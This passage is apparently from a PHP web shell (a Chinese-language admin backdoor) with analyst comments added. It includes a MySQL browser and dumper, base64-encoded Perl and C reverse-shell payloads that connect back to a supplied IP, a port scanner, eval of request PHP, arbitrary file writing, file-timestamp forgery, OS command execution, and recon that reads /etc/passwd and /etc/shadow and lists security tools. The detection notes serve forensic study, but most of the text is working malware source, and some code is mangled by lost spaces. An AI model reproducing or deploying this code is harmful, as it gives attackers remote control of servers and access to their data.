                            foreach($P['bak_table']as $k => $v) {

 

                                   if($v) {

 

                                          $DB->sqldump($v);

 

                                   }

 

                            }

 

                            exit;

 

                     }

 

                     $DB->close();

 

              }else {

 

                     m('Pleasechoose the table');

 

              }

 

              $doing= '';

 

       }

 

 

 

       formhead(array('title'=>'MYSQL管理', 'name'=>'dbform'));

 

       makehide('act','mysqladmin');

 

       makehide('doing',$doing);

 

       makehide('charset',$charset);

 

       makehide('tablename',$tablename);

 

       makehide('order',$order);

 

       p('<p>');

 

       p('地址:');

 

       makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));

 

       p('用户:');

 

       makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));

 

       p('密码:');

 

       makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));

 

       makeinput(array('value'=>'连接','type'=>'submit','class'=>'bt'));

 

       p('</p>');

 

 

 

       if($dbhost && $dbuser && isset($dbpass)) {

 

             

 

              //初始化数据库类

 

              $DB= new DB_MySQL;

 

              $DB->charsetdb= $charsetdb;

 

              $DB->charset= $charset;

 

              $DB->connect($dbhost,$dbuser, $dbpass, $dbname);

 

 

 

              //获取数据库信息

 

              p('<pclass="red">MySQL '.$DB->version().' running in '.$dbhost.' as'.$dbuser.'@'.$dbhost.'</p>');

 

              $highver= $DB->version() > '4.1' ? 1 : 0;

 

 

 

              //获取数据库

 

              $query= $DB->query("SHOW DATABASES");

 

              $dbs= array();

 

              $dbs[]= '-- Select a database --';

 

              while($db= $DB->fetch($query)) {

 

                     $dbs[$db['Database']]= $db['Database'];

 

              }

 

       makeselect(array('name'=>'dbname','option'=>$dbs,'selected'=>$dbname,'onchange'=>'setdb(this.options[this.selectedIndex].value)'));

 

 

 

              if($dbname) {

 

                     p('<p>Currentdababase: <ahref="javascript:setdb(\''.$dbname.'\');">'.$dbname.'</a>');

 

                     if($tablename) {

 

                            p('| Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a>[ <a href="javascript:settable(\''.$tablename.'\',\'structure\');">Structure</a> ]');

 

                     }

 

                     p('</p>');

 

 

 

                     $sql_query= isset($P['sql_query']) ? $P['sql_query'] : '';

 

 

 

                     if($tablename && !$sql_query) {

 

                            $sql_query= "SELECT * FROM $tablename LIMIT 0, 30";

 

                     }

 

                     if($tablename && $doing == 'structure') {

 

                            $sql_query= "SHOW FULL COLUMNS FROM $tablename;\n";

 

                            $sql_query.= "SHOW INDEX FROM $tablename;";

 

                     }

 

                     p('<p><tablewidth="200" border="0" cellpadding="0"cellspacing="0"><tr><td colspan="2">Run SQLquery/queries on database'.$dbname.':</td></tr><tr><td><textareaname="sql_query" class="area"style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><tdstyle="padding:0 5px;"><input class="bt"οnclick="$(\'doing\').value=\'\'" style="height:50px;"type="submit" value="Query"/></td></tr></table></p>');

 

                     if($sql_query) {

 

                            $querys= @explode(';',$sql_query);

 

                            foreach($querysas $num=>$query) {

 

                                   if($query) {

 

                                          p("<pclass=\"red b\">Query#{$num} :".htmlspecialchars($query,ENT_QUOTES)."</p>");

 

                                          switch($DB->query_res($query))

 

                                          {

 

                                                 case0:

 

                                                        p('<h2>'.$DB->halt('Error').'</h2>');

 

                                                        break;  

 

                                                 case1:

 

                                                        $result= $DB->query($query);

 

                                                        $tatol= $DB->num_rows($result);

 

                                                        p('<tableborder="0" cellpadding="3" cellspacing="0">');

 

                                                        p('<trclass="head">');

 

                                                        $fieldnum= @mysql_num_fields($result);

 

                                                        for($i=0;$i<$fieldnum;$i++){

 

                                                               p('<tdnowrap>'.@mysql_field_name($result, $i).'</td>');

 

                                                        }

 

                                                        p('</tr>');

 

                                                       

 

                                                        if(!$tatol) {

 

                                                               p('<trclass="alt2" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\'alt2\';"><td nowrapcolspan="'.$fieldnum.'" class="red b">Norecords</td></tr>');

 

                                                        }else {

 

                                                               while($mn= $DB->fetch($result)){

 

                                                                      $thisbg= bg();

 

                                                                      p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

 

                                                                      //读取记录用

 

                                                                      foreach($mnas $key=>$inside){

 

                                                                             p('<tdnowrap>'.(($inside == null) ? '<i>null</i>' :html_clean($inside)).'</td>');

 

                                                                      }

 

                                                                      p('</tr>');

 

                                                                      unset($b1);

 

                                                               }

 

                                                        }

 

                                                        p('</table>');

 

                                                        break;

 

                                                 case2:

 

                                                        p('<h2>AffectedRows : '.$DB->affected_rows().'</h2>');

 

                                                        break;

 

                                          }

 

                                   }

 

                            }

 

                     }else {

 

                            $query= $DB->query("SHOW TABLE STATUS");

 

                            $table_num= $table_rows = $data_size = 0;

 

                            $tabledb= array();

 

                            while($table= $DB->fetch($query)) {

 

                                   $data_size= $data_size + $table['Data_length'];

 

                                   $table_rows= $table_rows + $table['Rows'];

 

                                   $table_num++;

 

                                   $tabledb[]= $table;

 

                            }

 

                            $data_size= sizecount($data_size);

 

                            unset($table);

 

                            if(count($tabledb)) {

 

                                   if($highver) {

 

                                          $db_engine= $DB->fetch($DB->query("SHOW VARIABLES LIKE'storage_engine';"));                                  

 

                                          $db_collation= $DB->fetch($DB->query("SHOW VARIABLES LIKE'collation_database';"));

 

                                   }

 

                                   $sort= array('Name', 1);

 

                                   if($order){

 

                                          if(preg_match('!s_([A-z_]+)_(\d{1})!',$order, $match)) {

 

                                                 $sort= array($match[1], (int)$match[2]);

 

                                          }

 

                                   }

 

                                   usort($tabledb,'cmp');

 

                                   p('<tableborder="0" cellpadding="0" cellspacing="0"id="lists">');

 

                                   p('<trclass="head">');

 

                                   p('<tdwidth="2%"><input name="chkall" value="on"type="checkbox" οnclick="checkall(this.form)"/></td>');

 

                                   p('<td><ahref="javascript:setsort(\'s_Name_'.($sort[1]?0:1).'\');">Name</a>'.($order == 's_Name_0' ? $dchar : '').($order == 's_Name_1' || !$order ?$uchar : '').'</td>');

 

                                   p('<td><ahref="javascript:setsort(\'s_Rows_'.($sort[1]?0:1).'\');">Rows</a>'.($order== 's_Rows_0' ? $dchar : '').($order == 's_Rows_1' ? $uchar :'').'</td>');

 

                                   p('<td><ahref="javascript:setsort(\'s_Data_length_'.($sort[1]?0:1).'\');">Data_length</a>'.($order== 's_Data_length_0' ? $dchar : '').($order == 's_Data_length_1' ? $uchar :'').'</td>');

 

                                   p('<td><ahref="javascript:setsort(\'s_Create_time_'.($sort[1]?0:1).'\');">Create_time</a>'.($order== 's_Create_time_0' ? $dchar : '').($order == 's_Create_time_1' ? $uchar :'').'</td>');

 

                                   p('<td><ahref="javascript:setsort(\'s_Update_time_'.($sort[1]?0:1).'\');">Update_time</a>'.($order== 's_Update_time_0' ? $dchar : '').($order == 's_Update_time_1' ? $uchar :'').'</td>');

 

                                   if($highver) {

 

                                          p('<td>Engine</td>');

 

                                          p('<td>Collation</td>');

 

                                   }

 

                                   p('<td>Other</td>');

 

                                   p('</tr>');

 

                                   foreach($tabledb as $key => $table) {

 

                                          $thisbg= bg();

 

                                          p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

 

                                          p('<tdalign="center" width="2%"><inputtype="checkbox" name="bak_table[]"value="'.$table['Name'].'" /></td>');

 

                                          p('<td><ahref="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');

 

                                          p('<td>'.$table['Rows'].'&nbsp;</td>');

 

                                          p('<td>'.sizecount($table['Data_length']).'</td>');

 

                                          p('<td>'.$table['Create_time'].'&nbsp;</td>');

 

                                          p('<td>'.$table['Update_time'].'&nbsp;</td>');

 

                                          if($highver) {

 

                                                 p('<td>'.$table['Engine'].'</td>');

 

                                                 p('<td>'.$table['Collation'].'</td>');

 

                                          }

 

                                          p('<td><ahref="javascript:settable(\''.$table['Name'].'\',\'structure\');">Structure</a></td>');

 

                                          p('</tr>');

 

                                   }

 

                                   p('<trclass="head">');

 

                                   p('<tdwidth="2%">&nbsp;</td>');

 

                                   p('<td>'.$table_num.'table(s)</td>');

 

                                   p('<td>'.$table_rows.'</td>');

 

                                   p('<td>'.$data_size.'</td>');

 

                                   p('<td>&nbsp;</td>');

 

                                   p('<td>&nbsp;</td>');

 

                                   if($highver) {

 

                                          p('<td>'.$db_engine['Value'].'</td>');

 

                                          p('<td>'.$db_collation['Value'].'</td>');

 

                                   }

 

                                   p('<td>&nbsp;</td>');

 

                                   p('</tr>');

 

                                   p("<trclass=\"".bg()."\"><tdcolspan=\"".($highver ? 9 : 7)."\"><inputname=\"saveasfile\" value=\"1\" type=\"checkbox\"/> Save as file <input class=\"input\"name=\"bak_path\" value=\"".SA_ROOT.$dbname.".sql\"type=\"text\" size=\"60\" /> <inputclass=\"bt\" type=\"button\" value=\"Export selectiontable\"οnclick=\"$('doing').value='dump';$('dbform').submit();\"/></td></tr>");

 

                                   p("</table>");

 

                            }else {

 

                                   p('<pclass="red b">No tables</p>');

 

                            }

 

                            $DB->free_result($query);

 

                     }

 

              }

 

              $DB->close();

 

       }

 

       formfoot();

 

}//end mysql

 

 

 

elseif ($act == 'backconnect') {
       // Analyst note: this branch drops an embedded program into /tmp and launches it through
       // execute() with an address ($p2) and port ($p3) taken from the request.
       // Indicators visible in this code: the paths /tmp/angel_bc and /tmp/angel_bc.c, and the
       // web-server account running perl or gcc followed by an outbound TCP connection.
       // Hardening that breaks this path: mount /tmp noexec, keep compilers off web hosts,
       // and filter egress from the PHP worker.
       // Address defaults to the requesting client, port to 12345, when not supplied.
       !$p2&& $p2 = $_SERVER['REMOTE_ADDR'];
       !$p3&& $p3 = '12345';
       // Options offered in the "Use" selector below.
       $usedb= array('perl'=>'perl','c'=>'c');
// Base64 text; it decodes to a Perl script (begins with "#!/usr/bin/perl" and "use Socket;").
// Because it is stored encoded, a plain-text scan of this file for socket or /bin/sh strings will not match.
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
       "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
       "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
       "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
       "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
       "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
              "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
// Base64 text; it decodes to C source (begins with "#include <stdio.h>").
// Forensic caveat from the decoded text: the program removes its own file ("rm -f" on argv[0])
// and zeroes its argument strings, so on a live host the binary may be gone from /tmp and the
// process listing may not show the address or port. Check the process's executable link and
// open sockets rather than relying on the file being present.
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
       "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
       "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
       "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
       "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
       "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
       "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
              "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
       // Runs only when the form was submitted with p1 == 'start' and all three fields are set.
       if($p1 == 'start' && $p2 && $p3 && $p4){
              if($p4 == 'perl') {
                     // cf() base64-decodes the blob and writes it to the given path.
                     cf('/tmp/angel_bc',$back_connect);
                     // Request values are concatenated into the command line without escaping.
                     $res= execute(which('perl')." /tmp/angel_bc ".$p2."".$p3." &");
              }else {
                     cf('/tmp/angel_bc.c',$back_connect_c);
                     $res= execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
                     // The C source is deleted right after compilation; only the binary is left to find.
                     @unlink('/tmp/angel_bc.c');
                     $res= execute("/tmp/angel_bc ".$p2." ".$p3." &");
              }
              m('Nowscript try connect to '.$p2.':'.$p3.' ...');
       }
       // Form that posts act=backconnect with p1='start' plus the three fields.
       formhead(array('title'=>'BackConnect', 'onsubmit'=>'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);returnfalse;'));
       p('<p>');
       p('YourIP:');
       makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
       p('YourPort:');
       makeinput(array('name'=>'p3','size'=>15,'value'=>$p3));
       p('Use:');
       makeselect(array('name'=>'p4','option'=>$usedb,'selected'=>$p4));
       makeinput(array('value'=>'Start','type'=>'submit','class'=>'bt'));
       p('</p>');
       formfoot();
}//end

 

 

 

elseif ($act == 'portscan') {
       // Analyst note: this branch makes the web server open TCP connections to a host and port
       // list taken from the request, so a compromised site can be used to probe services that
       // are only reachable from inside the network.
       // Detection: a burst of short-lived outbound connections from the PHP worker to one
       // address across many ports. Egress filtering on the web tier limits what can be reached.
       // Defaults: the local host and a fixed list of common service ports.
       !$p2&& $p2 = '127.0.0.1';
       !$p3&& $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958';
       formhead(array('title'=>'端口扫描','onsubmit'=>'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);returnfalse;'));
       p('<p>');
       p('IP:');
       makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
       p('Port:');
       makeinput(array('name'=>'p3','size'=>80,'value'=>$p3));
       makeinput(array('value'=>'扫描','type'=>'submit','class'=>'bt'));
       p('</p>');
       formfoot();
       if($p1 == 'start') {
              p('<h2>Result»</h2>');
              p('<ulclass="info">');
              // One connection attempt per comma-separated entry, with a 1-second timeout.
              foreach(explode(',',$p3) as $port) {
                     // Warnings are suppressed, so failures leave nothing in the PHP error log.
                     $fp= @fsockopen($p2, $port, $errno, $errstr, 1);
                     // $p2 and $port are written into the page without HTML escaping.
                     if(!$fp) {
                            p('<li>'.$p2.':'.$port.'------------------------ <spanclass="b">Close</span></li>');
                 } else {
                            p('<li>'.$p2.':'.$port.'------------------------ <span class="redb">Open</span></li>');
                            @fclose($fp);
                 }
              }
              p('</ul>');
       }
}

 

 

 

elseif ($act == 'eval') {
       // Analyst note: request data ($p1) is passed to eval(), i.e. arbitrary PHP runs with the
       // privileges of the web server account.
       // eval is a language construct, not a function, so a disable_functions list does not
       // remove it; finding this pattern relies on code scanning and file-integrity monitoring
       // of the web root.
       $phpcode= trim($p1);
       if($phpcode){
              // Input without any "<?" is wrapped in PHP open/close tags before evaluation.
              if(!preg_match('#<\?#si', $phpcode)) {
                     $phpcode= "<?php\n\n{$phpcode}\n\n?>";
              }
              // The leading "?>" and trailing "<?" make eval() treat the text as a template.
              eval("?".">$phpcode<?");
       }
       formhead(array('title'=>'EvalPHP代码','onsubmit'=>'g(\'eval\',null,this.p1.value);return false;'));
       maketext(array('title'=>'PHP代码','name'=>'p1', 'value'=>$phpcode));
       // The link target is assembled from short string fragments, so searching this file for
       // the complete URL as one string finds nothing; signatures need to match the fragments.
       p('<p><ahref="http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/"target="_blank">获得插件</a></p>');
       formfooter();
}//end eval

 

 

 

elseif ($act == 'editfile') {
       // Analyst note: this branch writes request data ($p3) to a request-chosen path ($p2) and
       // reads any existing file back into the form. Both operations use PHP file functions
       // (fopen/fwrite/fread), which are the calls an open_basedir restriction applies to.
       // Edit file
       if($p1 == 'edit' && $p2 && $p3) {
              // Mode 'w' truncates an existing file or creates a new one; errors are suppressed.
              $fp= @fopen($p2,'w');
              m('Savefile '.(@fwrite($fp,$p3) ? 'success' : 'failed'));
              @fclose($fp);
       }
       $contents= '';
       if(file_exists($p2)){
              $fp=@fopen($p2,'r');
              $contents=@fread($fp,filesize($p2));
              @fclose($fp);
              // Escaped so the file body can be shown inside the textarea.
              $contents=htmlspecialchars($contents);
       }
       formhead(array('title'=>'创建/编辑文件','onsubmit'=>'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);returnfalse;'));
       makeinput(array('title'=>'文件名:','name'=>'p2','value'=>$p2,'newline'=>1));
       maketext(array('title'=>'文件内容:','name'=>'p3','value'=>$contents));
       formfooter();
       goback();
}//end editfile

 

 

 

elseif ($act == 'newtime') {
       // Analyst note: this branch only renders two forms; both submit to act 'file' with the
       // sub-actions 'clonetime' and 'settime', whose handlers are not part of this section.
       // Judging by the form titles they change a file's last-modified time, so on a host where
       // this script was present, modification times alone are weak evidence in a timeline.
       // Current mtime of the selected path, used to pre-fill the second form.
       $filemtime= @filemtime($p1);
       // Form 1: copy the timestamp of a reference path onto the target path.
       formhead(array('title'=>'Clonefolder/file was last modified time','onsubmit'=>'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);returnfalse;'));
       makeinput(array('title'=>'Alterfolder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
       makeinput(array('title'=>'Referencefolder/file','name'=>'p3','value'=>$cwd,'size'=>120,'newline'=>1));
       formfooter();
       // Form 2: set an explicit "Y-m-d H:i:s" timestamp on the target path.
       formhead(array('title'=>'Setlast modified','onsubmit'=>'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);returnfalse;'));
       makeinput(array('title'=>'Currentfolder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
       makeinput(array('title'=>'Modifytime','name'=>'p3','value'=>date("Y-m-d H:i:s",$filemtime),'size'=>120,'newline'=>1));
       formfooter();
       goback();
}//end newtime

 

 

 

elseif ($act == 'shell') {
       // Analyst note: the request value $p1 is handed to execute() as an operating-system
       // command and its output is printed. Commands started this way run outside PHP, so an
       // open_basedir restriction does not confine what they can read or write.
       // Detection: shells or system utilities spawned as children of the web server / PHP worker.
       formhead(array('title'=>'执行命令', 'onsubmit'=>'g(\'shell\',null,this.p1.value);return false;'));
       p('<p>');
       // Only the echoed form value is escaped; the command itself is used as submitted.
       makeinput(array('name'=>'p1','value'=>htmlspecialchars($p1)));
       makeinput(array('class'=>'bt','type'=>'submit','value'=>'执行'));
       p('</p>');
       formfoot();
       if($p1) {
              // Command output is placed in the page without HTML escaping.
              p('<pre>'.execute($p1).'</pre>');
       }
}//end shell

 

 

 

elseif ($act == 'phpenv') {
       // Analyst note: this branch prints a summary of the server and PHP configuration. The
       // settings it reads (disable_functions, open_basedir, safe_mode, allow_url_fopen, ...)
       // are the ones that decide how much the other branches of this script can do.
       // Database client extensions detected by probing for one function of each.
       $d=array();
       if(function_exists('mysql_get_client_info'))
              $d[]= "MySql (".mysql_get_client_info().")";
       if(function_exists('mssql_connect'))
              $d[]= "MSSQL";
       if(function_exists('pg_connect'))
              $d[]= "PostgreSQL";
       if(function_exists('oci_connect'))
              $d[]= "Oracle";
       // Each entry is array(label, value). Entries 1-9 describe the server, 10 onwards PHP.
       $info= array(
              1=> array('服务器 时间',date('Y/m/d h:i:s',$timestamp)),
              2=> array('服务器 域名',$_SERVER['SERVER_NAME']),
              3=> array('服务器IP',gethostbyname($_SERVER['SERVER_NAME'])),
              4=> array('服务器 系统',PHP_OS),
              // This value is the client's Accept-Language request header.
              5=> array('服务器 系统编码',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
              6=> array('服务器 软件',$_SERVER['SERVER_SOFTWARE']),
              7=> array('服务器 网站端口',$_SERVER['SERVER_PORT']),
              8=> array('PHP 运行方式',strtoupper(php_sapi_name())),
              9=> array('文件路径',__FILE__),
              10=> array('PHP 版本',PHP_VERSION),
              11=> array('PHP信息',(IS_PHPINFO ? '<ahref="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
              12=> array('安全模式',getcfg('safe_mode')),
              13=> array('管理员',(isset($_SERVER['SERVER_ADMIN']) ?$_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))),
              14=> array('允许url打开',getcfg('allow_url_fopen')),
              15=> array('使用dl',getcfg('enable_dl')),
              16=> array('显示错误',getcfg('display_errors')),
              17=> array('注册全局变量',getcfg('register_globals')),
              18=> array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
              19=> array('内存限制',getcfg('memory_limit')),
              20=> array('post大小',getcfg('post_max_size')),
              21=> array('上传文件大小',(getcfg('file_uploads') ?getcfg('upload_max_filesize') : 'Not allowed')),
              22=> array('执行时间',getcfg('max_execution_time').'second(s)'),
              23=> array('禁用功能',($dis_func ? $dis_func : 'No')),
              24=> array('所支持的数据库',implode(', ', $d)),
              25=> array('Curl支持',function_exists('curl_version') ?'Yes' : 'No'),
              // Entries 26-28 are defined here, but the loops below stop at index 25.
              26=> array('Open base dir',getcfg('open_basedir')),
              27=> array('Safe mode exec dir',getcfg('safe_mode_exec_dir')),
              28=> array('Safe mode include dir',getcfg('safe_mode_include_dir')),
       );
       // Two headed lists: index 0 prints entries 1-9, index 1 prints entries 10-25.
       $hp= array(0=> 'Server', 1=> 'PHP');
       for($a=0;$a<2;$a++){
              p('<h2>'.$hp[$a].'»</h2>');
              p('<ulclass="info">');
              if($a==0) {
                     for($i=1;$i<=9;$i++){
                            p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
                     }
              }elseif ($a == 1) {
                     for($i=10;$i<=25;$i++){
                            p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
                     }
              }
              p('</ul>');
       }
}//end phpenv

 

 

 

elseif ($act == 'secinfo') {
       // Analyst note: host reconnaissance. On non-Windows hosts it checks whether the account
       // files are readable, reads several system files and looks up three lists of program
       // names; on Windows it runs four built-in commands.
       // Detection: the web server account reading /etc/passwd, /etc/shadow, /proc/version,
       // /etc/issue.net, /etc/hosts or /etc/fstab, or spawning `which`, `df`, `net` or
       // `ipconfig`, is worth an audit rule. A readable /etc/shadow for that account is a
       // misconfiguration in its own right.
       if(!IS_WIN ) {
              // Build and scripting tools.
              $userful=array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
              // Names of anti-virus, intrusion-detection, firewall and log-monitoring programs.
              $danger= array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
              // Programs able to fetch files over the network.
              $downloaders= array('wget','fetch','lynx','links','curl','get','lwp-mirror');
              secparam('Readable/etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
              secparam('Readable/etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
              secparam('OSversion', @file_get_contents('/proc/version'));
              secparam('Distrname', @file_get_contents('/etc/issue.net'));
              // The ini value is stored in $safe_mode; the test below reads $GLOBALS['safe_mode'],
              // which is the same variable only if this code runs at global scope.
              $safe_mode= @ini_get('safe_mode');
              if(!$GLOBALS['safe_mode']){
                     // Each list is filtered through which() and printed as one comma-separated line.
                     $temp=array();
                     foreach($userful as $item)
                            if(which($item)){$temp[]=$item;}
                     secparam('Userful',implode(', ',$temp));
                     $temp=array();
                     foreach($danger as $item)
                            if(which($item)){$temp[]=$item;}
                     secparam('Danger',implode(', ',$temp));
                     $temp=array();
                     foreach($downloaders as $item)
                            if(which($item)){$temp[]=$item;}
                     secparam('Downloaders',implode(', ',$temp));
                     secparam('Hosts',@file_get_contents('/etc/hosts'));
                     secparam('HDDspace', execute('df -h'));
                     secparam('Mountoptions', @file_get_contents('/etc/fstab'));
              }
       }else {
              // Windows: OS version, account policy, local users and network configuration.
              secparam('OSVersion',execute('ver'));
              secparam('AccountSettings',execute('net accounts'));
              secparam('UserAccounts',execute('net user'));
              secparam('IPConfigurate',execute('ipconfig -all'));
       }
}//end

 

 

 

else {
       // Fallback for any $act value that none of the preceding branches matched;
       // the message text means "undefined action".
       m('未定义的行动');
}

 

 

 

?>

 

</td></tr></table>

 

<divstyle="padding:10px;border-bottom:1px solid #fff;border-top:1px solid#ddd;background:#eee;">

 

       <spanstyle="float:right;">

 

       <?php

 

       debuginfo();

 

       ob_end_flush();

 

       if(isset($DB)) {

 

              echo'. '.$DB->querycount.' queries';

 

       }

 

       ?>

 

       </span>

 

.

 

</div>

 

</body>

 

</html>

 

 

 

<?php

 

 

 

/*======================================================

 

函数库

 

======================================================*/

 

 

 

/**
 * Print one titled section of the information page.
 *
 * Nothing is printed when the trimmed value is empty. A single-line value is
 * followed by a line break; a value containing a newline is wrapped in <pre>.
 * Neither $n nor $v is HTML-escaped before being printed. The markup strings
 * are kept exactly as they appear in this listing.
 */
function secparam($n, $v) {
       $v = trim($v);
       if (!$v) {
              return;
       }
       p('<h2>'.$n.'»</h2>');
       p('<divclass="infolist">');
       $isMultiLine = strpos($v, "\n") !== false;
       if ($isMultiLine) {
              p('<pre>'.$v.'</pre>');
       } else {
              p($v.'<br/>');
       }
       p('</div>');
}

 

/**
 * Print a status message inside a highlighted box.
 *
 * $msg is written as-is, without HTML escaping.
 */
function m($msg) {
       $open = '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1pxsolid#e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
       $close = '</div>';
       echo $open, $msg, $close;
}

 

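/**
 * Strip backslash escaping from a value, recursing into nested arrays.
 *
 * Fix: the listing had "returnis_array(", which is a call to an undefined
 * function instead of a return statement; the keyword and the call are
 * separated again so the function returns its result.
 *
 * @param mixed $array a string, or an array of strings / nested arrays
 * @return mixed the same structure with stripslashes() applied to every leaf
 */
function s_array($array) {
       return is_array($array) ? array_map('s_array', $array) : stripslashes($array);
}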

 

/**
 * Set a cookie using the script-wide cookie settings.
 *
 * The name gets the configured prefix unless $prefix is false; the lifetime
 * falls back to the configured default when $life is 0. The "secure" argument
 * is 1 only when the request arrived on port 443, and no HttpOnly argument is
 * passed to setcookie().
 */
function scookie($key, $value, $life = 0,$prefix = 1) {
       global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
       $name = ($prefix ? $cookiepre : '').$key;
       $ttl = $life ? $life : $cookielife;
       $secure = ($_SERVER['SERVER_PORT'] == 443) ? 1 : 0;
       setcookie($name, $value, $timestamp + $ttl, $cookiepath, $cookiedomain, $secure);
}

 

/**
 * Print the login form (one password field posting act=login) and end the request.
 */
function loginpage() {
       formhead();
       makehide('act', 'login');
       $passwordField = array('name'=>'password','type'=>'password','size'=>'20');
       makeinput($passwordField);
       $submitButton = array('type'=>'submit','value'=>'登录');
       makeinput($submitButton);
       formfoot();
       // Nothing after the form is rendered for a visitor who is not logged in.
       exit;
}

 

// Run the command line $cfe and return whatever it printed, as a string.
//
// Analyst note: the function walks through five ways of starting a process and uses the
// first one that is available: system(), passthru(), shell_exec(), exec(), popen().
// A disable_functions policy therefore has to cover every primitive tried here; blocking
// only one or two leaves the command path open. Commands started this way run outside
// PHP, so open_basedir does not limit which files they can touch.
// Every call is prefixed with @, so failures produce no PHP warnings to alert on;
// process-creation auditing on the web server account is the reliable signal.
function execute($cfe) {
       $res= '';
       if($cfe) {
              if(function_exists('system')){
                     // system() prints directly, so the output is captured with a buffer.
                     @ob_start();
                     @system($cfe);
                     $res= @ob_get_contents();
                     @ob_end_clean();
              }elseif(function_exists('passthru')) {
                     // Same buffering approach for passthru().
                     @ob_start();
                     @passthru($cfe);
                     $res= @ob_get_contents();
                     @ob_end_clean();
              }elseif(function_exists('shell_exec')) {
                     $res= @shell_exec($cfe);
              }elseif(function_exists('exec')) {
                     // exec() fills $res with an array of output lines; they are joined back together.
                     @exec($cfe,$res);
                     $res= join("\n",$res);
              }elseif(@is_resource($f = @popen($cfe,"r"))) {
                     // Last resort: read the pipe in 1024-byte chunks until end of file.
                     $res= '';
                     while(!@feof($f)){
                            $res.= @fread($f,1024);
                     }
                     @pclose($f);
